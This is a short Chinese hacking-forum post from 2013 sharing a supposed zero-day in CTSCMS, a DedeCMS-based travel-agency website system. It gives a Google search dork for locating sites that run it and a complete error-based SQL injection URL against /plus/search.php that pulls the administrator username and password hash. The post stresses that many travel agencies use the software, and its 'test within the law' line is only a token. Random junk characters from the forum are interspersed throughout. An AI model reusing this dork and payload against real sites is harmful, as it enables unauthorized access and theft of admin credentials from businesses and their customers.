新年多放点0day,小范围共享!
# u* N7 t. Z# T中国旅游服务网站管理系统CTSCMS,这个网站系统是我在近期发现的。使用dedecms二次开发的,织梦内核。由于忽视了官方的系统升级导致程序有很多的漏洞。近期爆出的注入漏洞都存在,历史的漏洞不知道是否存在。, ~: Y9 ?5 k9 v& ^
Google:2002-2011 CTSCMS.COM ,inurl:users/reg.php 旅行社
8 i0 S! ?9 l* c8 g: d; v+ j2 \POC:/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
0 u4 F9 \$ R. [* R7 _" K, x: H' ^! A: c5 L
后来我又发现,这套程序都是一个人在做 国内很多旅行社网站在用
0 C% n4 P% H+ e" L9 _4 V# [: P, Q6 Y3 \2 C
/ X% X+ ?' b% m2 y! q/ H2 f
[; X2 b( @ z! G
( L" ~2 s o3 R5 r
+ v5 a3 C0 S" S很多大型旅行社网站都在用,请在法律允许的范围内测试。 黑客保重....: A% f2 O. B7 v9 h
! P x. O& N) Z4 _4 S7 v
|
发表于 2013-2-4 16:11:01
收藏
支持
反对